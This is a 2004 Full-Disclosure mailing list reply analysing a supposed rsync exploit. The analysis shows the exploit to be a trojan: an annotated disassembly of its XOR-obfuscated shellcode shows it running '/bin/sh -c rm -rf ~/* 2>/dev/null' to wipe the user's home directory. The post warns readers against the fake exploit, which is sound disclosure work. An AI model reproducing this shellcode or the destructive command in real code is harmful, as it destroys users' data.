[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] new rsync :) exploit rsync-too-open
- To: dkey <dk.dbox2@xxxxxxx>
- Subject: Re: [Full-Disclosure] new rsync :) exploit rsync-too-open
- From: Blue Boar <BlueBoar@xxxxxxxxxxx>
- Date: Fri, 28 May 2004 17:04:10 -0700
dkey wrote:
"nice mail"...but if somebody wants to use it, check the shellcode first...i
think it deletes all your files in your home dir. i'm not sure, maybe
somebody else can check it...
Yes.
seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing,
ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12
seg000:00000002
seg000:00000002 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF:
sub_2+10�p
seg000:00000002 pop esi ; ESI = addr of decode section
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; loop 75 times
seg000:00000007 mov al, 255 ; XOR value start
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF:
sub_2+C�j
seg000:00000009 xor [esi], al ; XOR current
byte in decode section with AL
seg000:0000000B dec al ; AL = AL - 1
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop
seg000:00000010 jmp short decoded
seg000:00000012 ;
---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000�j
seg000:00000012 call sub_2 ; push addr of decode section
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+E�j
seg000:00000017 call loc_41 ; push addr of "\bin\sh"
seg000:00000017 ;
---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0
seg000:00000024 aSh db 'sh',0
seg000:00000027 aC db '-c',0
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
seg000:00000041 ;
---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15�p
seg000:00000041 pop ebp ; EBP = addr of "\bin\sh"
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; 0
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; "'rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; "sh"
seg000:00000051 mov ebx, ebp ; "/bin/sh"
seg000:00000053 mov ecx, esp
seg000:00000055 xor edx, edx ; EDX = 0
seg000:00000057 mov al, 0Bh
seg000:00000059 int 80h ; LINUX - sys_execve
seg000:0000005B mov ebx, eax ; EBX = result
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; exit (1)
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060 seg000 ends
seg000:00000060 end
AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"
BB
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html